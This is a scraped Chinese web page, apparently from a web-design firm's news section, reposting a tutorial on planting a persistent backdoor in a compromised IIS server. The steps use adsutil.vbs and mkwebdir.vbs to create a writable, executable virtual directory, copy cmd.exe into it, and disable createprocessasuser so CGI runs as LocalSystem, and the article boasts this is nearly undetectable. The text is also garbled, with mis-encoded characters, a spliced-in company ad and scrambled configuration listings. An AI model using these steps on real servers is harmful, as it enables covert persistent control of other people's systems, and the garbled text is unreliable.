择天记,好看的言情小说

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷(xiāo)解決方案

真正的IIS永遠(yuǎn)的后門(mén)解密

IIS是比較流行的www服務(wù)器，設(shè)置不當(dāng)漏洞就很多。入侵iis服務(wù)器后留下后門(mén)，以后就可以隨時(shí)控制。一般的后門(mén)程序都是打開(kāi)一個(gè)特殊的端口來(lái)監(jiān)聽(tīng)，比如有nc,ntlm,rnc等等都是以一種類telnet的方式在服務(wù)器端監(jiān)聽(tīng)遠(yuǎn)程的連接控制。不過(guò)一個(gè)比較防范嚴(yán)密的www站點(diǎn)（他們的管理員吃了苦頭后）一般通過(guò)防火墻對(duì)端口進(jìn)行限制，這樣除了管理員開(kāi)的端口外，其他端口就不能連接了。但是80端口是不可能關(guān)閉的（如果管理員沒(méi)有吃錯(cuò)藥）。那么我們可以通過(guò)在80端口留后門(mén)，來(lái)開(kāi)啟永遠(yuǎn)的后門(mén)。

成都創(chuàng)新互聯(lián)公司是一家專注于成都網(wǎng)站制作、成都網(wǎng)站建設(shè)與策劃設(shè)計(jì),樂(lè)都網(wǎng)站建設(shè)哪家好?成都創(chuàng)新互聯(lián)公司做網(wǎng)站,專注于網(wǎng)站建設(shè)10多年,網(wǎng)設(shè)計(jì)領(lǐng)域的專業(yè)建站公司;建站業(yè)務(wù)涵蓋:樂(lè)都等地區(qū)。樂(lè)都做網(wǎng)站價(jià)格咨詢:18982081108

當(dāng)IIS啟動(dòng)CGI應(yīng)用程序時(shí)，缺省用CreateProcessAsUser API來(lái)創(chuàng)建該CGI的新Process,該程序的安全上下文就由啟動(dòng)該CGI的用戶決定。一般匿名用戶都映射到IUSR_computername這個(gè)賬號(hào)，當(dāng)然可以由管理員改為其他的用戶?；蛘哂蔀g覽器提供一個(gè)合法的用戶。兩者的用戶的權(quán)限都是比較低，可能都屬于guest組的成員。其實(shí)我們可以修改iis開(kāi)啟CGI的方式，來(lái)提高權(quán)限。我們來(lái)看iis主進(jìn)程本身是運(yùn)行在localsystem賬號(hào)下的，所以我們就可以得到最高localsystem的權(quán)限。

入侵web服務(wù)器后，一般都可以綁定一個(gè)cmd到一個(gè)端口來(lái)遠(yuǎn)程控制該服務(wù)器。這時(shí)可以有GUI的遠(yuǎn)程控制，比如338Array，或者類telnet text方式的控制，比如rnc。nc肯定是可以用的,其實(shí)這也足夠了。

1. telnet到服務(wù)器

 
 
 
  
  
  2. cscript.exe adsutil.vbs enum w3svc/1/root    
  
     
  
  KeyType : (STRING) "IIsWebVirtualDir"    
  
     
  
  AppRoot : (STRING) "/LM/W3SVC/1/ROOT"    
  
     
  
  AppFriendlyName : (STRING) "默認(rèn)應(yīng)用程序"    
  
     
  
  AppIsolated : (INTEGER) 2    
  
     
  
  AccessRead : (BOOLEAN) True    
  
     
  
  AccessWrite : (BOOLEAN) False    
  
     
  
  AccessExecute : (BOOLEAN) False    
  
     
  
  AccessScript : (BOOLEAN) True    
  
     
  
  AccessSource : (BOOLEAN) False    
  
     
  
  AccessNoRemoteRead : (BOOLEAN) False    
  
     
  
  AccessNoRemoteWrite : (BOOLEAN) False    
  
     
  
  AccessNoRemoteExecute : (BOOLEAN) False    
  
     
  
  AccessNoRemoteScript : (BOOLEAN) False

 
 
 
  
  
  HttpErrors : (LIST) (32 Items)    
  
     
  
  "400,*,FILE,C:WINNThelpiisHelpcommon400.htm"    
  
     
  
  "401,1,FILE,C:WINNThelpiisHelpcommon401-1.htm"    
  
     
  
  "401,2,FILE,C:WINNThelpiisHelpcommon401-2.htm"    
  
     
  
  "401,3,FILE,C:WINNThelpiisHelpcommon401-3.htm"    
  
     
  
  "401,4,FILE,C:WINNThelpiisHelpcommon401-4.htm"    
  
     
  
  "401,5,FILE,C:WINNThelpiisHelpcommon401-5.htm"

 
 
 
  
  
  FrontPageWeb : (BOOLEAN) True    
  
     
  
  Path : (STRING) "c:inetpubwwwroot"    
  
     
  
  AccessFlags : (INTEGER) 513    
  
     
  
  [/w3svc/1/root/localstart.asp]    
  
     
  
  [/w3svc/1/root/_vti_pvt]    
  
     
  
  [/w3svc/1/root/_vti_log]    
  
     
  
  [/w3svc/1/root/_private]    
  
     
  
  [/w3svc/1/root/_vti_txt]    
  
     
  
  [/w3svc/1/root/_vti_script]    
  
     
  
  [/w3svc/1/root/_vti_cnf]    
  
     
  
  [/w3svc/1/root/_vti_bin]

不要告訴我你不知道上面的輸出是什么！現(xiàn)在我們心里已經(jīng)有底了，是不是！呵呵管理員要倒霉了

 
 
 
  
  
  3. mkdir c:inetpubwwwrootdir1    
  
     
  
  4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:inetpubwwwrootdir1"

這樣就建好了一個(gè)虛目錄：Virtual Dir1，你可以用 1 的命令看一下

5. 接下來(lái)要改變一下Virtual Dir1的屬性為execute

 
 
 
  
  
  cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:    
  
     
  
  cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:

現(xiàn)在你已經(jīng)可以u(píng)pload 內(nèi)容到該目錄，并且可以運(yùn)行。你也可以把cmd.exe net.exe直接拷貝到虛擬目錄的磁盤(pán)目錄中。 bitsCN_com

6. 以下命令通過(guò)修改iis metabase 來(lái)迫使iis以本身的安全環(huán)境來(lái)創(chuàng)建新的CGI process

 
 
 
  
  
  Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false    
  
     
  
  注釋：cscript windows script host. bitscn.com    
  
     
  
  adsutil.vbs windows iis administration script    
  
     
  
  后面是 iis metabase path

這樣的后門(mén)幾乎是無(wú)法查出來(lái)的，除非把所有的虛目錄察看一遍

 
 
 
  
  
  "403,1,FILE,C:WINNThelpiisHelpcommon403-1.htm"    
  
     
  
  "403,2,FILE,C:WINNThelpiisHelpcommon403-2.htm"    
  
     
  
  "403,3,FILE,C:WINNThelpiisHelpcommon403-3.htm"    
  
     
  
  "403,4,FILE,C:WINNThelpiisHelpcommon403-4.htm"    
  
     
  
  "403,5,FILE,C:WINNThelpiisHelpcommon403-5.htm"    
  
     
  
  "403,6,FILE,C:WINNThelpiisHelpcommon403-6.htm"    
  
     
  
  "403,7,FILE,C:WINNThelpiisHelpcommon403-7.htm"    
  
     
  
  "403,8,FILE,C:WINNThelpiisHelpcommon403-8.htm"    
  
     
  
  "403,Array,FILE,C:WINNThelpiisHelpcommon403-Array.htm"    
  
     
  
  "403,10,FILE,C:WINNThelpiisHelpcommon403-10.htm"    
  
     
  
  "403,11,FILE,C:WINNThelpiisHelpcommon403-11.htm"    
  
     
  
  "403,12,FILE,C:WINNThelpiisHelpcommon403-12.htm"    
  
     
  
  "403,13,FILE,C:WINNThelpiisHelpcommon403-13.htm"    
  
     
  
  "403,15,FILE,C:WINNThelpiisHelpcommon403-15.htm"    
  
     
  
  "403,16,FILE,C:WINNThelpiisHelpcommon403-16.htm"    
  
     
  
  "403,17,FILE,C:WINNThelpiisHelpcommon403-17.htm" "404,*,FILE,C:WINNThelpiisHelpcommon404b.htm"    
  
     
  
  "405,*,FILE,C:WINNThelpiisHelpcommon405.htm"    
  
     
  
  "406,*,FILE,C:WINNThelpiisHelpcommon406.htm"    
  
     
  
  "407,*,FILE,C:WINNThelpiisHelpcommon407.htm"    
  
     
  
  "412,*,FILE,C:WINNThelpiisHelpcommon412.htm"    
  
     
  
  "414,*,FILE,C:WINNThelpiisHelpcommon414.htm"    
  
     
  
  "500,12,FILE,C:WINNThelpiisHelpcommon500-12.htm"    
  
     
  
  "500,13,FILE,C:WINNThelpiisHelpcommon500-13.htm"    
  
     
  
  "500,15,FILE,C:WINNThelpiisHelpcommon500-15.htm"    
  
     
  
  "500,100,URL,/iisHelp/common/500-100.asp"

IIS的后門(mén)解密就為大家介紹完了，希望大家已經(jīng)掌握。

新聞標(biāo)題：真正的IIS永遠(yuǎn)的后門(mén)解密
瀏覽地址：http://m.fisionsoft.com.cn/article/cdogodh.html

新聞中心

其他資訊